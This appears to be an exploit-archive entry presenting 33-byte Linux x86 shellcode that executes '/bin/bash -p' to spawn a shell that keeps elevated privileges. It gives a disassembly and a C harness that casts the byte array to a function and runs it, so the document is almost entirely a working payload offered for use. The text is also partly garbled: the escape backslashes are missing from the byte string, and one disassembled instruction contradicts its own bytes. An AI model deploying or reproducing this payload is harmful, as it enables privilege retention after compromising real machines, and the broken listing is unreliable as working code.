[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux x86 - execve("/bin/bash","-p",NULL) - 33 bytes
# Published : 2010-05-04
# Author : Jonathan Salwan
# Previous Title : Linux x86 - polymorphic execve("/bin/bash","-p",NULL) - 57 bytes
# Next Title : Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode
/*
Title: Linux x86 - execve("/bin/bash", ["/bin/bash", "-p"], NULL) - 33 bytes
Author: Jonathan Salwan
Mail: submit@shell-storm.org
Web: http://www.shell-storm.org
!Database of Shellcodes http://www.shell-storm.org/shellcode/
sh sets (euid, egid) to (uid, gid) if -p not supplied and uid < 100
Read more: http://www.faqs.org/faqs/unix-faq/shell/bash/#ixzz0mzPmJC49
sassembly of section .text:
08048054 <.text>:
8048054: 6a 0b push $0xb
8048056: 58 pop %eax
8048057: 99 cltd
8048058: 52 push %edx
8048059: 66 68 2d 70 pushw $0x702d
804805d: 89 e1 mov %esp,%ecx
804805f: 52 push %edx
8048060: 6a 68 push $0x68
8048062: 68 2f 62 61 73 push $0x7361622f
8048067: 68 2f 62 69 6e push $0x6e69622f
804806c: 89 e3 mov %esp,%ebx
804806e: 52 push %edx
804806f: 51 push %ecx
8048070: 53 push %ebx
8048071: 89 e1 mov %ecx,%ecx
8048073: cd 80 int $0x80
*/
#include <stdio.h>
char shellcode[] = "x6ax0bx58x99x52x66x68x2dx70"
"x89xe1x52x6ax68x68x2fx62x61"
"x73x68x2fx62x69x6ex89xe3x52"
"x51x53x89xe1xcdx80";
int main(int argc, char *argv[])
{
fprintf(stdout,"Length: %dn",strlen(shellcode));
(*(void(*)()) shellcode)();
}